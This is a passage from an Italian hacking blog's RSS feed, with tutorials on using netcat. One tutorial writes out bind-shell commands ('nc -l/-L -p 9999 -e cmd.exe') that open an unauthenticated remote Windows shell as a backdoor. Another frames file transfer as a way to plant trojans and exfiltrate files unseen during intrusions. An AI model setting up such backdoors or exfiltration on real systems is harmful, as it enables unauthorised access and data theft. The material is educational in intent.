src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Attaccare Windows con la Null Session' a NotizieFlash" alt="Aggiungi 'Attaccare Windows con la Null Session' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Twitter" alt="Aggiungi 'Attaccare Windows con la Null Session' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Attaccare+Windows+con+la+Null+Session&amp;url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Attaccare Windows con la Null Session' a Technotizie" alt="Aggiungi 'Attaccare Windows con la Null Session' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Attaccare+Windows+con+la+Null+Session&amp;url=http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/" title="Aggiungi 'Attaccare Windows con la Null Session' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Attaccare Windows con la Null Session' a FriendFeed" alt="Aggiungi 'Attaccare Windows con la Null Session' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Creare una backdoor con Netcat</title>
		<link>http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/</link>
		<comments>http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/#comments</comments>
		<pubDate>Mon, 10 Nov 2008 09:51:51 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[netcat]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/</guid>
		<description><![CDATA[In questo appuntamento della serie &#8220;Le 7 Vite di Netcat&#8221; si va decisamente sull&#8217;hackeresco, anche se in caso di estrema necessità si potrebbe ricorrere a questa tecnica anche per motivi leciti di amministrazione remota. Cos&#8217;è una backdoor? Una &#8220;porta di servizio&#8221; che permette l&#8217;amministrazione remota del computer. In genere dopo aver ottenuto l&#8217;accesso al computer  [...]]]></description>
			<content:encoded><![CDATA[<p>In questo appuntamento della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8221; si va decisamente sull&#8217;hackeresco, anche se in caso di estrema necessità si potrebbe ricorrere a questa tecnica anche per motivi leciti di amministrazione remota.</p>
<p>Cos&#8217;è una backdoor? Una &#8220;porta di servizio&#8221; che permette l&#8217;amministrazione remota del computer.<br />
In genere dopo aver ottenuto l&#8217;accesso al computer  l&#8217;hacker ha la necessità di tornare nel sistema in modo più agevole, oppure ha bisogno di un&#8217;interfaccia a linea di comando (shell) con la quale poter agire comodamente.</p>
<p>Abbiamo già visto che netcat può essere usato come server. In questo articolo vediamo come collegare a netcat in ascolto su di una porta Tcp la shell di sistema.</p>
<p>Per attivare netcat come backdoor usiamo il seguente comando:</p>
<p>nc -l -p 9999 -vv -e cmd.exe</p>
<p>Vediamo nel dettaglio. Il parametro -l lo abbiamo già visto nell&#8217;articolo sul trasferimento di file e dice a netcat di &#8220;ascoltare&#8221; sulla porta Tcp indicata dal parametro -p, in questo caso 9999 (valore arbitrario). Il cuore della tecnica è il parametro -e, che seguito da cmd.exe istruisce netcat a eseguire (-e ovvero exec) il comando specificato (cmd.exe, la shell di Windows) veicolando l&#8217;input/output attraverso netcat stesso.</p>
<p>Come ci si collega ad un host su cui è stata messa questa backdoor? Ma naturalmente con netcat!<br />
Se il computer sotto controllo ha come indirizzo Ip 192.168.0.1, otterremo l&#8217;accesso remoto con il comando:</p>
<p>nc 192.168.0.1 9999 -vv</p>
<p>ci troveremo di fronte al prompt dei comandi di Windows; solo che questo prompt non è della nostra macchina, ma quello della macchina remota!<br />
Per uscire dalla backdoor basta semplicemente digitare exit e la connessione si chiude. E qui c&#8217;è un problema.</p>
<p>Una volta chiusa la connessione in netcat remoto smette di ascoltare, semplicemente termina l&#8217;esecuzione; quindi non sarà più possibile collegarsi da remoto. Per aggirare questo problema ci viene in soccorso il parametro -L.</p>
<p>nc -L -p 9999 -vv &gt; trojan &lt;&#8211; notare la L maiuscola al posto di -l</p>
<p>Il parametro -L istruisce netcat a mantenere aperta la porta e restare in ascolto anche quando il programma eseguito con il comando -e viene interrotto. Così si potrà entrare e uscire dal sistema a piacere.</p>
<p>Un avvertimento necessario: questa tecnica è pericolosissima! Aprire una backdoor in questo modo, aprire una shell senza la protezione di una password è quasi un suicidio, significa spalancare una porta del sistema a chiunque. Se lo fate su un vostro sistema, se proprio dovete farlo, fatelo per periodi brevissimi e su porte non standard o non facilmente intuibili (9999 e 12345 non vanno benissimo).</p>
<p>Questo articolo fa parte della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8220;. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:</p>
<ul>
<li><a href="http://www.pillolhacking.net/2008/10/02/leggere-gli-header-http-e-le-pagine-web-con-netcat/" title="Leggere gli header HTTP e le pagine Web con Netcat" id="p1mn">Leggere gli header HTTP e le pagine Web con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/07/leggere-la-posta-elettronica-con-netcat/" title="Leggere la posta elettronica con Netcat" id="c6sn">Leggere la posta elettronica con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/20/inviare-email-con-netcat/" title="Inviare email con Netcat" id="ikhx">Inviare email con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/24/netcat-come-scanner/" title="Netcat come scanner" id="ar3p">Netcat come scanner</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Trasferire file con Netcat" id="bkqz">Trasferire file con Netcat</a></li>
</ul>
<ul>
<li>     Creare una backdoor con Netcat</li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/">Back Channel con Netcat</a></li>
</ul>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Creare una backdoor con Netcat' a Del.icio.us" alt="Aggiungi 'Creare una backdoor con Netcat' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Creare una backdoor con Netcat' a digg" alt="Aggiungi 'Creare una backdoor con Netcat' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Creare una backdoor con Netcat' a Technorati" alt="Aggiungi 'Creare una backdoor con Netcat' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Creare una backdoor con Netcat' a Google Bookmarks" alt="Aggiungi 'Creare una backdoor con Netcat' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Creare una backdoor con Netcat' a Segnalo" alt="Aggiungi 'Creare una backdoor con Netcat' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Creare una backdoor con Netcat' a OKnotizie" alt="Aggiungi 'Creare una backdoor con Netcat' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Creare+una+backdoor+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Creare una backdoor con Netcat' a Diggita" alt="Aggiungi 'Creare una backdoor con Netcat' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;t=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Creare una backdoor con Netcat' a FaceBook" alt="Aggiungi 'Creare una backdoor con Netcat' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/&amp;title=Creare+una+backdoor+con+Netcat" title="Aggiungi 'Creare una backdoor con Netcat' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Creare una backdoor con Netcat' a Upnews" alt="Aggiungi 'Creare una backdoor con Netcat' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Creare+una+backdoor+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Creare una backdoor con Netcat' a NotizieFlash" alt="Aggiungi 'Creare una backdoor con Netcat' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Creare una backdoor con Netcat' a Twitter" alt="Aggiungi 'Creare una backdoor con Netcat' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Creare+una+backdoor+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Creare una backdoor con Netcat' a Technotizie" alt="Aggiungi 'Creare una backdoor con Netcat' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Creare+una+backdoor+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/" title="Aggiungi 'Creare una backdoor con Netcat' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Creare una backdoor con Netcat' a FriendFeed" alt="Aggiungi 'Creare una backdoor con Netcat' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Trasferire File con Netcat</title>
		<link>http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/</link>
		<comments>http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/#comments</comments>
		<pubDate>Thu, 06 Nov 2008 14:16:22 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Utilities]]></category>
		<category><![CDATA[netcat]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/</guid>
		<description><![CDATA[Quinto appuntamento della serie &#8220;Le 7 Vite di Netcat&#8220;. In questo articolo presento come usare netcat per trasferire file tra due computer tramite una rete Tcp/Ip. Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o [...]]]></description>
			<content:encoded><![CDATA[<p>Quinto appuntamento della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8220;. In questo articolo presento come usare netcat per trasferire file tra due computer tramite una rete Tcp/Ip.</p>
<p>Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o installare servizi. Oppure durante un penetration test o durante un&#8217;intrusione può essere molto utile portare velocemente sul computer sotto attacco  trojan, rootkit o altri strumenti; oppure può essere necessario esfiltrare file senza lasciare tracce nei log. Un altro punto forte di questa tecnica è la diffusione di netcat sulle macchine Unix/Linux. Se si deve portare dei file su un Linux in rete senza troppi problemi si può utilizzare netcat.</p>
<p>La tecnica è abbastanza semplice: si usano due netcat, uno sulla macchina sorgente e uno sulla macchina di destinazione. Quest&#8217;ultimo avrà la funzione di server.</p>
<p>Netcat può agire come server. Questo significa che può mettersi &#8220;in ascolto&#8221; su di una porta Tcp e attendere una connessione. Per attivare questa funzione bisogna specificare sulla riga di comando il parametro -l (listen) e specificare la porta (-p):</p>
<p>nc -l -p 9999 -vv &gt; miofile</p>
<p>Questo comando mette netcat in ascolto sulla porta 9999; l&#8217;output viene reindirizzato al file miofile tramite il simbolo &gt;.</p>
<p>Questo significa che tutto quello che netcat riceverà sulla rete attraverso la porta 9999 verra memorizzato in un file di nome miofile. Sia il valore della porta (in questo caso  9999), sia il nome del file (miofile), sono arbitrari, possono essere qualsiasi cosa.</p>
<p>Mentre sul server netcat &#8220;ascolta&#8221;, sulla macchina sorgente, ovvero sulla macchina sulla quale è memorizzato il file da trasmettere al server, dovremo usare unnetcat in modalità client per inviare i dati del file da trasferire:</p>
<p>nc 127.0.0.1 9999 -vv &lt; miofile</p>
<p>Con questo comando invio il file &#8220;miofile&#8221; tramite la redirezione dell&#8217;input ottenuta con il simbolo &lt; all&#8217;host 127.0.0.1, ovvero il computer sul quale netcat è in &#8220;ascolto&#8221;, sulla porta 9999. In questo esempio ho utilizzato l&#8217;indirizzo del computer locale (127.0.0.1), ma nella realtà naturalmente l&#8217;indirizzo dovrà coincidere con l&#8217;Ip reale del computer server. Ovvero se il computer sul quale netcat è in ascolto in modalità server è 192.168.0.1, nel netcat in modalità client dovrò indicare proprio questo indirizzo.</p>
<p>Un&#8217;ultima considerazione: netcat non fornisce un indicatore di progresso del trasferimento in corso; per sapere quando il trasferimento stesso è terminato occorre controllare con il comando dir ols le dimensioni crescenti del file.</p>
<p>Questo articolo fa parte della serie &#8220;<a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/" id="y459" title="Le 7 Vite di Netcat">Le 7 Vite di Netcat</a>&#8220;. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:</p>
<ul>
<li><a href="http://www.pillolhacking.net/2008/10/02/leggere-gli-header-http-e-le-pagine-web-con-netcat/" title="Leggere gli header HTTP e le pagine Web con Netcat" id="p1mn">Leggere gli header HTTP e le pagine Web con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/07/leggere-la-posta-elettronica-con-netcat/" title="Leggere la posta elettronica con Netcat" id="c6sn">Leggere la posta elettronica con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/20/inviare-email-con-netcat/" title="Inviare email con Netcat" id="ikhx">Inviare email con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/10/24/netcat-come-scanner/" title="Netcat come scanner" id="ar3p">Netcat come scanner</a></li>
</ul>
<ul>
<li>     Trasferire file con Netcat</li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/11/10/creare-una-backdoor-con-netcat/">Creare una backdoor con Netcat</a></li>
</ul>
<ul>
<li>     <a href="http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/">Back Channel con Netcat</a></li>
</ul>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Trasferire File con Netcat' a Del.icio.us" alt="Aggiungi 'Trasferire File con Netcat' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Trasferire File con Netcat' a digg" alt="Aggiungi 'Trasferire File con Netcat' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Trasferire File con Netcat' a Technorati" alt="Aggiungi 'Trasferire File con Netcat' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Trasferire File con Netcat' a Google Bookmarks" alt="Aggiungi 'Trasferire File con Netcat' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Trasferire File con Netcat' a Segnalo" alt="Aggiungi 'Trasferire File con Netcat' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Trasferire File con Netcat' a OKnotizie" alt="Aggiungi 'Trasferire File con Netcat' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Trasferire+File+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Trasferire File con Netcat' a Diggita" alt="Aggiungi 'Trasferire File con Netcat' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;t=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Trasferire File con Netcat' a FaceBook" alt="Aggiungi 'Trasferire File con Netcat' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/&amp;title=Trasferire+File+con+Netcat" title="Aggiungi 'Trasferire File con Netcat' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Trasferire File con Netcat' a Upnews" alt="Aggiungi 'Trasferire File con Netcat' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Trasferire+File+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Trasferire File con Netcat' a NotizieFlash" alt="Aggiungi 'Trasferire File con Netcat' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Trasferire File con Netcat' a Twitter" alt="Aggiungi 'Trasferire File con Netcat' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Trasferire+File+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Trasferire File con Netcat' a Technotizie" alt="Aggiungi 'Trasferire File con Netcat' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Trasferire+File+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/" title="Aggiungi 'Trasferire File con Netcat' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Trasferire File con Netcat' a FriendFeed" alt="Aggiungi 'Trasferire File con Netcat' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/06/trasferire-file-con-netcat/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Bluetooth Fingerprinting Manuale</title>
		<link>http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/</link>
		<comments>http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/#comments</comments>
		<pubDate>Tue, 28 Oct 2008 12:48:46 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Wireless]]></category>
		<category><![CDATA[bluetooth]]></category>
		<category><![CDATA[fingerprinting]]></category>
		<category><![CDATA[hackjng]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/</guid>
		<description><![CDATA[In questo articolo presento una tecnica artigianale di Bluetooth fingerprinting. Ho già parlato di OS fingerprinting e browser fingerprinting, metodi in grado di riconoscere un sistema operativo o un browser da remoto, analizzando i pochi dati di cui si può in qualche modo venire in possesso. Tramite il Bluetooth fingerprinting possiamo stabilire da remoto la [...]]]></description>
			<content:encoded><![CDATA[<p>In questo articolo presento una tecnica artigianale di Bluetooth fingerprinting. Ho già parlato di OS fingerprinting e browser fingerprinting, metodi in grado di riconoscere un sistema operativo o un browser da remoto, analizzando i pochi dati di cui si può in qualche modo venire in possesso.<br id="zuk_" /><br />
